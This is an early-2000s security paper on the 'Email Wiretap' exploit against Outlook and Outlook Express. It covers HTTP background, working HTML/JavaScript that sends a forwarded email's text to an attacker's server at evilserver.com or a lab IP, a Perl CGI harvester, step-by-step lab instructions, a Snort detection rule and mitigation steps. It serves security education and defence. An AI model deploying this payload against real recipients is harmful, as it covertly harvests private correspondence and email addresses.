Email Wiretap
Carolyn A. Davenport
May 2, 2001

Exploit Name: Email Wiretap

Variants: None known

Operating System: Relevant to email readers on Windows 9x, NT, 2000, Mac

Protocols/services: utilizes the http application protocol and the client-side active scripting interpreter.

Brief description: Due to the insecure, default settings of Outlook and Outlook Express, a malicious user can craft an html email, which will enable the malicious user to read forwarded instances of the email. In addition, the malicious user can use the email to track and compile a database of email addresses.

Credits: Discovered October 5, 1998 by Carl Voth

Protocol description:

How does the exploited protocol work?

When a user retrieves a web page via their browser (Netscape, Internet Explorer, lynx, etc.), they typically type a web address into an address bar. An example would be www.yahoo.com. The browser makes the assumption that the protocol is HTTP. The browser then sends a request to the appropriate DNS server, asking for the IP address of the website. The DNS server should return an IP address. Once the IP address of the Internet server is known, a TCP connection is established with the Internet server. Next, the browser sends a request to the Internet server over the established TCP connection. An example would be "GET / HTTP/1.0" followed by two carriage returns (CRLF).

[me@me html]$ telnet www.somename31337.com 80

Trying 192.168.1.1...

Connected to www.somename31337.com.

Escape character is '^]'.

GET / HTTP/1.0

HTTP/1.1 200 OK

Date: Fri, 19 Dec 1997 20:24:38 GMT

Server: someserver v1.2

Last-Modified: Thu, 03 Apr 1997 00:30:37 GMT

ETag: "someEtag"

Accept-Ranges: bytes

Content-Length: 112

Connection: close

Content-Type: text/html

<meta http-equiv="Refresh" content="0; url=http://someothersite.com/foo.html">

<!-- (C) 2001 SomeCompany -->

The Internet server returns a document to the browser. This document can contain scripting code, links to other servers, links to images, and much more. The browser now retrieves each separate image, script, link, etc. The user sees the page displayed within their browser window. Although the user only typed one web address into the address bar, the browser may have made many connections to many different servers across the Internet in order to retrieve all of the information displayed. Let's look at a more concrete example (NOTE: the domain names are fake).

Joe Smith is running Windows 2000 with Internet Explorer 5. Joe double-clicks his desktop "Internet Explorer" icon and his browser launches. Joe highlights the contents of his address bar and types in "www.goople3494.com". www.goople3494.com is resolved to IP address 192.168.1.1. A connection to 192.168.1.1 is established and Joe's browser sends the following request:

GET / HTTP/1.1

Accept: application/MSWord, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*

Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Host: www.goople3494.com Connection: Keep-Alive

The web server replies HTTP/1.1 200 OK.

<specifics regarding version and type of server, date, etc.>

<html><body>

<img src="http://www.someotherserver3494/BigFatLogo.gif">

</body></html>

Joe's browser now resolves www.someotherserver3494 to IP address 192.168.1.2. A session, like the one above, occurs between www.someotherserver3494.com and Joe's browser. The image is downloaded and displayed in Joe's browser window.

As I mentioned above, the HTML downloaded from an Internet server, or read in an html email reader, can include scripts. Scripts are not displayed in the browser or html email reader. Instead, when the browser or email reader encounters the <script> directive, it reads all code up to the </script> directive. All code is interpreted and run on the client computer. In this example, JavaScript is used. JavaScript is a powerful, interpreted language. A simple example of JavaScript embedded within an html document is:

<html><body>

<script>

window.open("http://www.google.com");

</script>

</html></body>

DESCRIPTION OF VARIANTS:

None known.

How the exploit works:

There are 2 parts to this exploit.

Part one is the client email reader, which must support DHTML with active scripting enabled. The client must have an active connection to the Internet. Part two is an Internet server running a cgi script to receive and save the forwarded messages.

The malicious user now creates an email with the following html:

<HTML><BODY>

<SCRIPT>

var evilserver = "http://www.evilserver.com/cgi-bin/harvester.cgi?"

var msg = document.body.innerText;

var sendit = new Image();

sendit.src = evilserver + "fwmsg=" + escape(msg);

</SCRIPT>

I think your partner is pretty durn hot!<br><br>

you know who ;-)

</BODY></HTML>

Before sending the email, the malicious user must:

1) have the ability to write and execute cgi scripts on the server www.evilserver.com
2) create a script to parse and save the forwarded messages.

The malicious user creates a script like:

#!/usr/bin/perl

open (OUT, ">>get_rez.txt");

print OUT "$ENV{'REQUEST_URI'}\n";

exit(0);

Now the user sends the email to the intended victim. The victim receives the email and forwards the email, with comments, to his/her husband/wife, partner, boss, etc. When the recipient highlights the email in their email reader, the script will activate and forward the "forwarded" message to www.evilserver.com. The attacker now has the victim's reaction to his/her email. If the email is forwarded again, www.evilserver.com will receive and save any new comments added to the email as well as the list of email addresses that the victim forwarded to. This could go on endlessly. Each time the email is forwarded, the evil Internet server receives more comments and email addresses.

Diagram:

DEFER

How to Use the Exploit:

Now, we can get to a step-by-step working example. Please note that this should only be done in a lab environment for educational purposes. It is unethical (not to mention illegal in most places) to run this exploit on unsuspecting clients.

Prerequisites (i.e. what we'll need for this experiment)

Access to a Linux Apache web server. Access to a windows machine with the Outlook email client. Outlook client should already be configured to send and receive email with a valid account.

We need to create an html document. The simplest way to do this is to open up an editor. On your Windows machine:

1) click the start button.

2) Click the "Run" bar.

3) Type "cmd" (windows NT/2000) or "command" (windows 9x) in the window.

4) This will open up a DOS prompt. At the c:> prompt, type "notepad email_wiretap.html".

5) Click "Yes" on the "create a new file" message.

6) Insert the following into your new file:

<HTML><BODY>

<SCRIPT>

var evilserver = "http://10.10.10.10/cgi-bin/harvester.cgi?"

var msg = document.body.innerText;

var sendit = new Image();

sendit.src = evilserver + "fwmsg=" + escape(msg);

</SCRIPT>

I think your partner is pretty durn hot!<br><br>

you know who ;-)

</BODY></HTML>

In the above text, be sure to substitute the true IP address of your web server (i.e. change the 10.10.10.10 to your valid IP address). Next, click "file" and "Save as...". Save the file as "email_wiretap.html" onto your desktop.

Now, we need to setup the cgi script that will be harvesting these forwarded emails. For this example, we'll use the Apache web server running on Linux. On your linux web server, locate your cgi-bin directory. The cgi-bin is defined in the Apache httpd.conf file. If you don't know where that file is, type "find / -name httpd.conf -print" at a command prompt. Then type 'grep "cgi\-bin" /path/to/httpd.conf | grep -i directory'. This should return the full path to your cgi-bin directory.

7) Change into the cgi-bin directory ("cd /path/to/cgi-bin").

8) Type, "vi harvester.cgi".

9) Type "i" to go into insert mode.

10) Type in the following program:

#!/usr/bin/perl

open (OUT, ">>get_rez.txt");

print OUT "$ENV{'REQUEST_URI'}\n";

exit(0);

11) Type ":wq" to exit and save your file.

12) Type "chmod 755 harvester.cgi".

On the Windows machine

13) open your Outlook client.

14) Double-click on the file email_wiretap.html on your desktop. This should open a browser with the short message that you inserted above.

15) Click "Edit" and "Select All".

16) Click "Edit" and "Copy".

17) On your Outlook email client, click on "New Mail".

18) Enter your valid email address into the "TO: field. In the "Subject:" field, enter the subject line "This is a test".

19) Click on the main body of the email. Click "Edit" and "Paste". You should see the short message inserted into the main window of your new email message.

20) On your linux machine, type the following command from insided the cgi-bin directory: "tail -f get_rez.txt". This will show you the message as it is appended into your collection file.

21) On the windows machine, hit the "send" button on your newly created email.

22) Wait a minute, and click "Send and Receive" to receive your test email.

23) Once received, right click on the email and click "Forward".

24) At the top of the email message type "This is the forwarded portion of the email".

25) Click "Send".

26) Retrieve your email again and highlight the forwarded message. You should see something like the following on your Linux web server (trimmed and sanitized): /cgi-bin/harvester.cgi?fwmsg=This%20is%20the%20forwarded%20portion%20of%20the
%20email%0D%0A%0D%0A-----%20Original%20Message%20-----%20%0D%0A
From%3A%20Some%20Emailaddr%20%0D%0ATo%3A%20you@you.com
%20%0D%0ASent%3A%20Thursday%2C%20

February%2015%2C%202001%2012%3A46%20PM%0D%0A
Subject%3A%20Fw%3A%20partner%0D%0A%0D%0AMessage%20-----

Note the string "This%20is%20the%20forwarded%20portion%20of%20the%20email%".

If you strip out the %20's (space), you see that the remote web server has successfully snagged the forwarded portion of the email.

Signature of the attack:

This attack is very hard to pin a signature on. The outbound HTTP GET request is valid and common traffic on most networks. The only part that looks a little out of place is the %0D%0A (CRLF) interspersed within the email and the fact that someuser@yourcompany.com is also included in the URL. Unfortunately, we can't match on the "%0D%0A" since the CRLF is prevalent in all HTTP requests. We can however, create a signature to look for outgoing "user@yourcompany.com" embedded in HTTP GET requests (I guarantee this will generate false positives!).

(SNORT RULE  alert tcp any -> any 80 (msg:"Outgoing web request with email addresses in GET request"; content: "@yourcompany.com"; nocase;)

How to protect against this attack:

Disable active scripting within your email reader.

1) open Outlook client and click "tools" and "options".

2) click "security"

3) change zone setting to "restricted zone"

4) click "zone settings".

5) highlight "restricted sites"

6) click "custom level"

7) scroll down to "active scripting" and click disable

8) click "OK" 3 times to exit the existing windows.

Source Code/Pseudo code

The code samples above work just fine. However, for a more detailed scripts see the URL below.

http://www.geocities.com/ResearchTriangle/Facility/8332/reaper-exploit-release.html

Links to additional information:

http://www.geocities.com/ResearchTriangle/Facility/8332/reaper-exploit-release.html

http://www.cen.uiuc.edu/~ejk/browser-security.html#Voth

http://www.idg.net/crd_privacy_412136_103.html

http://www.infoworld.com/articles/hn/xml/01/02/05/010205hnwiretap.xml

to top of page | to Threats & Vulnerabilities | to Reading Room Home